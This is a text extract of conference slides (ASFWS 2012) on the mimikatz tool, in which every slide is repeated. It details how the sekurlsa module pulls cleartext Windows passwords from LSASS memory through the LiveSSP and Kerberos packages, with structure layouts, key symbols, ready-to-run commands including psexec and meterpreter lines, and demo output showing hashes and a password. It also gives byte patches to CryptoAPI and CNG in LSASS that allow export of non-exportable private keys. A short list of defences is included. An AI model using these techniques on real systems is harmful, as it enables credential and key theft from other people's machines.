07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 22 22
mimikatz sekurlsa livessp how
mimikatz sekurlsa livessp how
Actually Irsquove only used logical (empirical) approach to search passwordshellip ndash Protocol reading
ndash Symbols searching
~ Boring ~hellip be more brutal this time make a WinDBG trap
Actually Irsquove only used logical (empirical) approach to search passwordshellip ndash Protocol reading
ndash Symbols searching
~ Boring ~hellip be more brutal this time make a WinDBG trap
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 23 23
0 kdgt process 0 0 lsassexe PROCESS 83569040 SessionId 0 Cid 0224 Peb 7f43f000 ParentCid 01b4 DirBase 5df58100 ObjectTable 80ce4740 HandleCount ltData Not Accessiblegt Image lsassexe 0 kdgt process i 83569040 You need to continue execution (press g ltentergt) for the context to be switched When the debugger breaks in again you will be in the new process context 0 kdgt g Break instruction exception - code 80000003 (first chance) ntRtlpBreakWithStatusInstruction 814b39d0 cc int 3 0 kdgt reload user Loading User Symbols 0 kdgt bp p $proc lsasrvLsaProtectMemory kc 5 g 0 kdgt g
mimikatz sekurlsa livessp how
mimikatz sekurlsa livessp how
Letrsquos login with a Live account on Windows 8
After credentials protection LsaApLogonUserEx2 calls LiveCreateLogonSession to insert data in LiveGlobalLogonSessionList (similar to WDigest)
Letrsquos login with a Live account on Windows 8
After credentials protection LsaApLogonUserEx2 calls LiveCreateLogonSession to insert data in LiveGlobalLogonSessionList (similar to WDigest)
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 24 24
lsasrvLsaProtectMemory livesspLiveMakeSupplementalCred livesspLiveMakeSecPkgCredentials livesspLsaApLogonUserEx2 livesspSpiLogonUserEx2 lsasrvLsaProtectMemory msv1_0NlpAddPrimaryCredential msv1_0SspAcceptCredentials msv1_0SpAcceptCredentials lsasrvLsaProtectMemory tspkgTSHidePassword tspkgSpAcceptCredentials
1 kdgt uf c livesspLsaApLogonUserEx2 livesspLsaApLogonUserEx2 (74781536) [] livesspLsaApLogonUserEx2+0x560 (74781a96) call to livesspLiveCreateLogonSession (74784867)
Our LiveSSP provider
Yeah Pass the Hash capability with Live account toohellip
Live user can logon through RDP via SSO
mimikatz sekurlsa livessp workflow
mimikatz sekurlsa livessp workflow
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 25 25
LsaUnprotectMemory
LsaEnumerateLogonSessions
for each LUID
password in clear
typedef struct _KIWI_LIVESSP_LIST_ENTRY struct _KIWI_LIVESSP_LIST_ENTRY Flink struct _KIWI_LIVESSP_LIST_ENTRY Blink PVOID unk0 PVOID unk1 PVOID unk2 PVOID unk3 DWORD unk4 DWORD unk5 PVOID unk6 LUID LocallyUniqueIdentifier LSA_UNICODE_STRING UserName PVOID unk7 PKIWI_LIVESSP_PRIMARY_CREDENTIAL suppCreds
KIWI_LIVESSP_LIST_ENTRY PKIWI_LIVESSP_LIST_ENTRY
livesspLiveGlobalLogonSessionList
search linked list for LUID
KIWI_LIVESSP_LISKIWI_LIVESSP_LIST_ENTRY KIWI_LIVESSP_PRIKIWI_LIVESSP_PRIMARY_CREDENTIAL
typedef struct _KIWI_LIVESSP_PRIMARY_CREDENTIAL DWORD isSupp DWORD unk0 LSA_UNICODE_STRING UserName LSA_UNICODE_STRING Domaine LSA_UNICODE_STRING Password
KIWI_LIVESSP_PRIMARY_CREDENTIAL PKIWI_LIVESSP_PRIMARY_CREDENTIAL
mimikatz sekurlsa mimikatz sekurlsa
Even if we already have tools for normal accounts are you not curious to test one with this trap
Even if we already have tools for normal accounts are you not curious to test one with this trap
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 26 26
Me yes
mimikatz sekurlsa kerberos mimikatz sekurlsa kerberos
Letrsquos login normal account
After credentials protection KerbCreateLogonSession calls ndash NT6 KerbInsertOrLocateLogonSession to insert data in
KerbGlobalLogonSessionTable
ndash NT5 KerbInsertLogonSession to insert data in KerbLogonSessionList
Letrsquos login normal account
After credentials protection KerbCreateLogonSession calls ndash NT6 KerbInsertOrLocateLogonSession to insert data in
KerbGlobalLogonSessionTable
ndash NT5 KerbInsertLogonSession to insert data in KerbLogonSessionList
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 27 27
lsasrvLsaProtectMemory kerberosKerbHideKey kerberosKerbCreatePrimaryCredentials kerberosKerbCreateLogonSession kerberosSpAcceptCredentials lsasrvLsaProtectMemory kerberosKerbHidePassword kerberosKerbCreateLogonSession kerberosSpAcceptCredentials lsasrvLsaProtectMemory msv1_0NlpAddPrimaryCredential msv1_0SspAcceptCredentials msv1_0SpAcceptCredentials lsasrvLsaProtectMemory wdigestSpAcceptCredentials lsasrvLsaProtectMemory tspkgTSHidePassword tspkgSpAcceptCredentials
Kerberos part for password
Kerberos ticket part Maybe )
mimikatz sekurlsa kerberos (nt6) workflow
mimikatz sekurlsa kerberos (nt6) workflow
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 28 28
RtlLookupElementGenericTableAvl
LsaUnprotectMemory
KIWI_KERBEROS_PR
KIWI_KERBEROS_PRIMARY_CREDENTIAL
typedef struct _KIWI_KERBEROS_PRIMARY_CREDENTIAL DWORD unk0 PVOID unk1 PVOID unk2 PVOID unk3 ifdef _M_X64 BYTE unk4[32] elif defined _M_IX86 BYTE unk4[20] endif LUID LocallyUniqueIdentifier ifdef _M_X64 BYTE unk5[44] elif defined _M_IX86 BYTE unk5[36] endif LSA_UNICODE_STRING UserName LSA_UNICODE_STRING Domaine LSA_UNICODE_STRING Password KIWI_KERBEROS_PRIMARY_CREDENTIAL PKIWI_KERBEROS_PRIMARY_CREDENTIAL
LsaEnumerateLogonSessions
for each LUID
password in clear
KIWI_KERBEROS_PR
KIWI_KERBEROS_PRIMARY_CREDENTIAL
KerberosKerbGlobalLogonSessionTable
mimikatz sekurlsa kerberos (nt5) workflow
mimikatz sekurlsa kerberos (nt5) workflow
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 29 29
LsaUnprotectMemory
LsaEnumerateLogonSessions
for each LUID
password in clear
typedef struct _KIWI_KERBEROS_LOGON_SESSION struct _KIWI_KERBEROS_LOGON_SESSION Flink struct _KIWI_KERBEROS_LOGON_SESSION Blink DWORD UsageCount PVOID unk0 PVOID unk1 PVOID unk2 DWORD unk3 DWORD unk4 PVOID unk5 PVOID unk6 PVOID unk7 LUID LocallyUniqueIdentifier
ifdef _M_IX86 DWORD unk8
endif DWORD unk9 DWORD unk10 PVOID unk11 DWORD unk12 DWORD unk13 PVOID unk14 PVOID unk15 PVOID unk16 [hellip] LSA_UNICODE_STRING UserName LSA_UNICODE_STRING Domaine LSA_UNICODE_STRING Password
KIWI_KERBEROS_LOGON_SESSION PKIWI_KERBEROS_LOGON_SESSION
kerberosKerbLogonSessionList
search linked list for LUID
KIWI_LIVESSP_PRIKIWI_LIVESSP_PRIMARY_CREDENTIAL
mimikatz sekurlsa demo time
mimikatz sekurlsa demo time
Final sekurlsa demo sekurlsalogonPasswords full
Final sekurlsa demo sekurlsalogonPasswords full
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 30 30
mimikatz sekurlsa kerberos ldquohu rdquo
mimikatz sekurlsa kerberos ldquohu rdquo
Ok It workshellip
But why
Not at all logon on NT5 (can need an unlock)
From my understanding of Microsoft explanations
ndash no need of passwords for the Kerberos protocolhellip
ndash all is based on the hash (not very sexy too)
Microsoftrsquos implementation of Kerberos is full of logicalhellip
ndash For password auth
bull password hash for shared secret but keeping password in memory
ndash For full smartcard auth
bull No password on client
bull No hash on client
ndash NTLM hash on clienthellip
ndash KDC sent it back as a gift
Ok It workshellip
But why
Not at all logon on NT5 (can need an unlock)
From my understanding of Microsoft explanations
ndash no need of passwords for the Kerberos protocolhellip
ndash all is based on the hash (not very sexy too)
Microsoftrsquos implementation of Kerberos is full of logicalhellip
ndash For password auth
bull password hash for shared secret but keeping password in memory
ndash For full smartcard auth
bull No password on client
bull No hash on client
ndash NTLM hash on clienthellip
ndash KDC sent it back as a gift
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 31 31
mimikatz sekurlsa mimikatz sekurlsa
All passwords in memory are encrypted but in a reversible way to be used
We used LsaUnprotecMemory in the LSASS context to decrypt them
ndash This function rely on LsaEncryptMemory from lsasrvdll
For that we previously inject a DLL (sekurlsadll) in the LSASS process to take benefits of its keys when we called it
Can it be fun to decrypt outside the process ndash Yes it ishellip no more injection just reading memory of LSASS processhellip
mimikatz can use lsasrvdll too and ldquoimportsrdquo LSASS initialized keys ndash When we call LsaEncryptMemory in mimikatz with all keys imported from LSASS we have
the same comportments than when we are in LSASS
All passwords in memory are encrypted but in a reversible way to be used
We used LsaUnprotecMemory in the LSASS context to decrypt them
ndash This function rely on LsaEncryptMemory from lsasrvdll
For that we previously inject a DLL (sekurlsadll) in the LSASS process to take benefits of its keys when we called it
Can it be fun to decrypt outside the process ndash Yes it ishellip no more injection just reading memory of LSASS processhellip
mimikatz can use lsasrvdll too and ldquoimportsrdquo LSASS initialized keys ndash When we call LsaEncryptMemory in mimikatz with all keys imported from LSASS we have
the same comportments than when we are in LSASS
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 32 32
LsaUnprotectMemory
mimikatz sekurlsa LsaEncryptMemory NT5
mimikatz sekurlsa LsaEncryptMemory NT5
Depending on the size of the secret LsaEncryptMemory use
ndash RC4
ndash DESx
Depending on the size of the secret LsaEncryptMemory use
ndash RC4
ndash DESx
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 33 33
g_pRandomKey
g_cbRandomKey
BYTE[g_cbRandomKey]
DWORD 256
BYTE[g_cbRandomKey]
g_pDESXKey BYTE[144]
BYTE[144]
g_Feedback BYTE[8]
lsass
lsass
lsasrv
lsasrv
lsass
lsass
lsasrv
lsasrv
mimikatz
mimikatz
lsasrv
lsasrv
copyhellip
mimikatz sekurlsa LsaEncryptMemory NT6
mimikatz sekurlsa LsaEncryptMemory NT6
Depending on the size of the secret LsaEncryptMemory use
ndash 3DES
ndash AES
Depending on the size of the secret LsaEncryptMemory use
ndash 3DES
ndash AES
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 34 34
InitializationVector BYTE[16]
lsass
lsass
lsasrv
lsasrv
lsass
lsass
lsasrv
lsasrv
mimikatz
mimikatz
copyhellip
h3DesKey
typedef struct _KIWI_BCRYPT_KEY_DATA DWORD size DWORD tag DWORD type DWORD unk0 DWORD unk1 DWORD unk2 DWORD unk3 PVOID unk4 BYTE data etc KIWI_BCRYPT_KEY_DATA PKIWI_BCRYPT_KEY_DATA
hAesKey
lsasrv
lsasrv
typedef struct _KIWI_BCRYPT_KEY DWORD size DWORD type PVOID unk0 PKIWI_BCRYPT_KEY_DATA cle PVOID unk1 KIWI_BCRYPT_KEY PKIWI_BCRYPT_KEY
mimikatz sekurlsa memo
mimikatz sekurlsa memo
Security Packages
Protection Keys
Security Packages
Protection Keys
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 35 35
Package Symbols Type
tspkg tspkgTSGlobalCredTable RTL_AVL_TABLE
wdigest wdigestl_LogSessList LIST_ENTRY
livessp livesspLiveGlobalLogonSessionList LIST_ENTRY
kerberos (nt5) kerberosKerbLogonSessionList LIST_ENTRY
kerberos (nt6) kerberosKerbGlobalLogonSessionTable RTL_AVL_TABLE
msv1_0 lsasrvLogonSessionList lsasrvLogonSessionListCount
LIST_ENTRY ULONG
Key NT 5 Symbols
RC4 lsasrvg_cbRandomKey lsasrvg_pRandomKey
DESx lsasrvg_pDESXKey lsasrvg_Feedback
Key NT 6 Symbols
lsasrvInitializationVector
3DES lsasrvh3DesKey
AES lsasrvhAesKey
mimikatz sekurlsa memo
mimikatz sekurlsa memo
Some commands mimikatz privilegedebug sekurlsalogonPasswords full exit
psexec windows -s -c cmimikatzWin32mimikatzexe sekurlsalogonPasswords full exit
meterpreter gt execute -H -c -i -m -f pentestpasswordsmimikatzmimikatz_x86exe
Some commands mimikatz privilegedebug sekurlsalogonPasswords full exit
psexec windows -s -c cmimikatzWin32mimikatzexe sekurlsalogonPasswords full exit
meterpreter gt execute -H -c -i -m -f pentestpasswordsmimikatzmimikatz_x86exe
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 36 36
mimikatz 10 x64 (RC) Traitement du Kiwi (Aug 2 2012 013228) httpbloggentilkiwicommimikatz mimikatz privilegedebug Demande dACTIVATION du privilegravege SeDebugPrivilege OK mimikatz sekurlsalogonPasswords full Authentification Id 0234870 Package dauthentification NTLM Utilisateur principal Gentil Kiwi Domaine dauthentification vm-w8-rp-x msv1_0 Utilisateur Gentil Kiwi Domaine vm-w8-rp-x Hash LM d0e9aee149655a6075e4540af1f22d3b Hash NTLM cc36cf7a8514893efccd332446158b1a kerberos Utilisateur Gentil Kiwi Domaine vm-w8-rp-x Mot de passe waza1234 wdigest Utilisateur Gentil Kiwi Domaine vm-w8-rp-x Mot de passe waza1234 tspkg Utilisateur Gentil Kiwi Domaine vm-w8-rp-x Mot de passe waza1234 livessp nt (LUID KO)
mimikatz sekurlsa what we can do
mimikatz sekurlsa what we can do
Basics ndash No physical access to computer (first step to pass the hash then pass the pass) ndash No admin rights system rights debug privileges (hellip) ndash Disable local admin accounts ndash Strong passwords (haha it was a joke so useless ) ndash For privileged account network login instead of interactive (when possible) ndash Audit pass the hash keeps traces and can lock accounts ndash No admin rights system rights debug privileges even VIP ndash Use separated network (or forest) for privileged tasks
More in depth ndash Force strong authentication (SmartCard amp Token) $ euro ndash Short validity for Kerberos tickets ndash No delegation ndash Disable NTLM (available with NT6) ndash No exotic
bull biometrics (it keeps password somewhere and push it to Windows) bull single sign on
ndash Stop shared secrets for authentication push Public Private stuff (like keys )) ndash Let opportunities to stop retro compatibility ndash Disable faulty providers
bull Is it supported by Microsoft bull Even if you can disable LiveSSP TsPkg and WDigest will you disable Kerberos and msv1_0
Basics ndash No physical access to computer (first step to pass the hash then pass the pass) ndash No admin rights system rights debug privileges (hellip) ndash Disable local admin accounts ndash Strong passwords (haha it was a joke so useless ) ndash For privileged account network login instead of interactive (when possible) ndash Audit pass the hash keeps traces and can lock accounts ndash No admin rights system rights debug privileges even VIP ndash Use separated network (or forest) for privileged tasks
More in depth ndash Force strong authentication (SmartCard amp Token) $ euro ndash Short validity for Kerberos tickets ndash No delegation ndash Disable NTLM (available with NT6) ndash No exotic
bull biometrics (it keeps password somewhere and push it to Windows) bull single sign on
ndash Stop shared secrets for authentication push Public Private stuff (like keys )) ndash Let opportunities to stop retro compatibility ndash Disable faulty providers
bull Is it supported by Microsoft bull Even if you can disable LiveSSP TsPkg and WDigest will you disable Kerberos and msv1_0
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 37 37
mimikatz crypto what is it
mimikatz crypto what is it
A little module that I wrote to ndash play with Windows Cryptographic API CNG and RSA keys
ndash automate export of certificateskeys bull Even those which are ldquonotrdquo exportable
What crypto module can do ndash List
bull Providers
bull Stores
bull Certificates
bull Keys
ndash Export bull Certificates
ndash public in DER format
ndash with private keys in PFX format
bull Private keys in PVK format ndash itrsquos cool OpenSSL can deal with it too
ndash Patch bull CryptoAPI in mimikatz context
bull CNG in LSASS context (again )
A little module that I wrote to ndash play with Windows Cryptographic API CNG and RSA keys
ndash automate export of certificateskeys bull Even those which are ldquonotrdquo exportable
What crypto module can do ndash List
bull Providers
bull Stores
bull Certificates
bull Keys
ndash Export bull Certificates
ndash public in DER format
ndash with private keys in PFX format
bull Private keys in PVK format ndash itrsquos cool OpenSSL can deal with it too
ndash Patch bull CryptoAPI in mimikatz context
bull CNG in LSASS context (again )
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 38 38
mod_mimikatz_crypto
mimikatz crypto how itrsquos protected
mimikatz crypto how itrsquos protected
Private keys are DPAPI protected ndash You cannot reuse private key files on another computer
bull At least without the master keys andor password of users
ComputerUser can load their own keys because they have enough secrets to do it (ex session opened) ndash Yes a computerserver open a ldquosessionrdquo
ExportUsage can be limited by ndash Password
ndash Popup
ndash ExportArchive flag no present
Private keys are DPAPI protected ndash You cannot reuse private key files on another computer
bull At least without the master keys andor password of users
ComputerUser can load their own keys because they have enough secrets to do it (ex session opened) ndash Yes a computerserver open a ldquosessionrdquo
ExportUsage can be limited by ndash Password
ndash Popup
ndash ExportArchive flag no present
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 39 39
Constraint for most user Unavailable for computer keys
certutil -importpfx mycertp12 NoExport certutil -csp Microsoft Enhanced Cryptographic Provider v10 -importpfx mycertp12 NoExport
mimikatz crypto capi how it works
mimikatz crypto capi how it works
ldquoMicrosoft CryptoAPI provides a secure interface for the cryptographic functionality that is supplied by the installable cryptographic service provider (CSP) modules CSPs perform all cryptographic operations and manage private keys CSPs can be implemented in software as well as in hardwarerdquo ndash httptechnetmicrosoftcomlibrarycc962093aspx
Processes (mimikatz IIS Active Directory Internet Explorer yourappsherehellip) load some DLL to deal with different cryptographic stuff CSP (keys) smartcard reader hellip ndash cryptdlldll rsaenhdll hellip
Process deal with cryptographic keys by this APIhellip
ldquoMicrosoft CryptoAPI provides a secure interface for the cryptographic functionality that is supplied by the installable cryptographic service provider (CSP) modules CSPs perform all cryptographic operations and manage private keys CSPs can be implemented in software as well as in hardwarerdquo ndash httptechnetmicrosoftcomlibrarycc962093aspx
Processes (mimikatz IIS Active Directory Internet Explorer yourappsherehellip) load some DLL to deal with different cryptographic stuff CSP (keys) smartcard reader hellip ndash cryptdlldll rsaenhdll hellip
Process deal with cryptographic keys by this APIhellip
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 40 40
mimikatz crypto capi how itrsquos exported ( level)
mimikatz crypto capi how itrsquos exported ( level)
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 41 41
Process
CryptoAPI and RSA CSP
Exportable
Load Private Key
Exported Key
yes
NTE_BAD_KEY_STATE
no
DPAPI Decode
PLAYSKOOL
Ask to export Key
mimikatz crypto patchcapi because I own my process
mimikatz crypto patchcapi because I own my process
When we want to export a certificate with its private key (or only the key) it goes in rsaenhCPExportKey
This function do all the work to prepare the export and check if the key is exportable
When we want to export a certificate with its private key (or only the key) it goes in rsaenhCPExportKey
This function do all the work to prepare the export and check if the key is exportable
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 42 42
mimikatz cryptoexportCertificates Emplacement CERT_SYSTEM_STORE_CURRENT_USERMy - Benjamin Delpy Container Cleacute 470ADFBA-8718-4014-B05E-B30776B75A03 Provider Microsoft Enhanced Cryptographic Provider v10 Type AT_KEYEXCHANGE Exportabiliteacute NON Taille cleacute 2048 Export priveacute dans CERT_SYSTEM_STORE_CURRENT_USER_My_0_Benjamin Delpypfx KO (0x8009000b) Cleacute non valide pour lutilisation dans leacutetat speacutecifieacute Export public dans CERT_SYSTEM_STORE_CURRENT_USER_My_0_Benjamin Delpyder OK
================ Certificat 0 ================ Numeacutero de seacuterie 112169417a1c3ef46a301f99385f50680fa0 Eacutemetteur CN=GlobalSign CodeSigning CA - G2 O=GlobalSign nv-sa C=BE Objet CN=Benjamin Delpy C=FR Il ne sagit pas dun certificat racine Hach cert (sha1) ab 9e 92 b9 43 ed 47 d9 15 bc 26 93 9e 24 a5 83 03 ac aa 7e Conteneur de cleacute = 470ADFBA-8718-4014-B05E-B30776B75A03 Fournisseur = Microsoft Enhanced Cryptographic Provider v10 La cleacute priveacutee NE PEUT PAS ecirctre exporteacutee Succegraves du test de cryptage CertUtil -exportPFX EacuteCHEC de la commande 0x8009000b (-2146893813) CertUtil Cleacute non valide pour lutilisation dans leacutetat speacutecifieacute
Exportable
mimikatz crypto patchcapi because I own my process
mimikatz crypto patchcapi because I own my process
So what A module in my own process return that I canrsquot do something CryptoAPI is in my memory space letrsquos patch it
I wrote ldquo4rdquo bytes in my memory space
So what A module in my own process return that I canrsquot do something CryptoAPI is in my memory space letrsquos patch it
I wrote ldquo4rdquo bytes in my memory space
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 43 43
text0AC0B7CB 0F 85 33 C7 FF FF jnz continue_key_export_or_archive
text0AC0B7CB 90 nop
text0AC0B7CC E9 33 C7 FF FF jmp continue_key_export_or_archive
text0AC1F749 0F 85 B6 3B FF FF jnz continue_key_export_or_archive_prepare
text0AC1F749 90 nop
text0AC1F74A E9 B6 3B FF FF jmp continue_key_export_or_archive_prepare
mimikatz crypto patchcapi demo time
mimikatz crypto patchcapi demo time
Import export import as not exportablehellip export
Import export import as not exportablehellip export
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 44 44
mimikatz crypto patchcapi limitations
mimikatz crypto patchcapi limitations
Because ndash Irsquom lazy
ndash Irsquove seen in majority of case RSA keys for real life use bull Elliptic Curve a littlehellip
mimikatz cryptopatchcapi only deal with ndash Microsoft Base Cryptographic Provider v10
ndash Microsoft Enhanced Cryptographic Provider v10
ndash Microsoft Enhanced RSA and AES Cryptographic Provider
ndash Microsoft RSA SChannel Cryptographic Provider
ndash Microsoft Strong Cryptographic Provider
hellipall based on rsaenhdll
Because ndash Irsquom lazy
ndash Irsquove seen in majority of case RSA keys for real life use bull Elliptic Curve a littlehellip
mimikatz cryptopatchcapi only deal with ndash Microsoft Base Cryptographic Provider v10
ndash Microsoft Enhanced Cryptographic Provider v10
ndash Microsoft Enhanced RSA and AES Cryptographic Provider
ndash Microsoft RSA SChannel Cryptographic Provider
ndash Microsoft Strong Cryptographic Provider
hellipall based on rsaenhdll
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 45 45
mimikatz crypto cng how it works
mimikatz crypto cng how it works
ldquoCryptography API Next Generation (CNG) is the long-term replacement for the CryptoAPI CNG is designed to be extensible at many levels and cryptography agnostic in behaviorrdquo ndash httpmsdnmicrosoftcomlibrarywindowsdesktopaa376210aspx
ldquoTo comply with common criteria (CC) requirements the long-lived keys must be isolated so that they are never present in the application process CNG currently supports the storage of asymmetric private keys by using the Microsoft software KSP that is included with Windows Server 2008 and Windows Vista and installed by default
This time keys operations are not made in the ldquouserrdquo process context
Process use RPC to call ldquoKey isolation servicerdquo (keyiso) functions
It seems more secure than CryptoAPIhellip ndash It is but itrsquos not perfecthellip
ldquoCryptography API Next Generation (CNG) is the long-term replacement for the CryptoAPI CNG is designed to be extensible at many levels and cryptography agnostic in behaviorrdquo ndash httpmsdnmicrosoftcomlibrarywindowsdesktopaa376210aspx
ldquoTo comply with common criteria (CC) requirements the long-lived keys must be isolated so that they are never present in the application process CNG currently supports the storage of asymmetric private keys by using the Microsoft software KSP that is included with Windows Server 2008 and Windows Vista and installed by default
This time keys operations are not made in the ldquouserrdquo process context
Process use RPC to call ldquoKey isolation servicerdquo (keyiso) functions
It seems more secure than CryptoAPIhellip ndash It is but itrsquos not perfecthellip
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 46 46
mimikatz crypto cng how itrsquos exported ( level)
mimikatz crypto cng how itrsquos exported ( level)
KeyIso Service (LSASS Process)
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 47 47
Process
CNG
Exportable
Load Private Key
Exported Key
yes
NTE_NOT_SUPPORTED
RPC
DPAPI Decode
PLAYSKOOL
Ask to export Key
NT6 System protected process ML_SYSTEM SYSTEM_MANDATORY_LABEL_NO_WRITE_UP SYSTEM_MANDATORY_LABEL_NO_READ_UP
no
mimikatz crypto patchcng because sometimes I own LSASS
mimikatz crypto patchcng because sometimes I own LSASS
When we want to export a certificate with its private key (or only the key) RPC calls lead to lsass(keyiso)ncryptSPCryptExportKey
This function do all the work to prepare the export and check if the key is exportable
When we want to export a certificate with its private key (or only the key) RPC calls lead to lsass(keyiso)ncryptSPCryptExportKey
This function do all the work to prepare the export and check if the key is exportable
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 48 48
mimikatz cryptoexportKeys [user] Cleacutes CNG - cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318 Exportabiliteacute NON Taille cleacute 2048 Export priveacute dans cng_user_0_cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318pvk KO mod_cryptonggetPrivateKeyPrivateKeyBlobToPVK (0x80090029) Lopeacuteration demandeacutee nest pas prise en charge
Exportable
mimikatz crypto patchcng because sometimes I own LSASS
mimikatz crypto patchcng because sometimes I own LSASS
This time checks and keys are in LSASS processhellip And what
I wrote ldquo1rdquo byte in LSASS memory spacehellip
This time checks and keys are in LSASS processhellip And what
I wrote ldquo1rdquo byte in LSASS memory spacehellip
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 49 49
text6C815210 75 1C jnz short continue_key_export
text6C815210 EB 1C jmp short continue_key_export
mimikatz crypto patchcng demo time
mimikatz crypto patchcng demo time
Import export import as not exportablehellip export again
Import export import as not exportablehellip export again
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 50 50
mimikatz crypto patchcng limitations
mimikatz crypto patchcng limitations
Patch operation needs some privileges ndash Admin (debug privilege)
ndash SYSTEM
mimikatz cryptopatchcng only deal with ndash Microsoft Software Key Storage Provider (maybe others algs than RSA)
Not a limitation of mimikatz but MMC addin for certificates cannot export CNG certificateshellip even those that are exportable (hu ) ndash certutil canhellip
Patch operation needs some privileges ndash Admin (debug privilege)
ndash SYSTEM
mimikatz cryptopatchcng only deal with ndash Microsoft Software Key Storage Provider (maybe others algs than RSA)
Not a limitation of mimikatz but MMC addin for certificates cannot export CNG certificateshellip even those that are exportable (hu ) ndash certutil canhellip
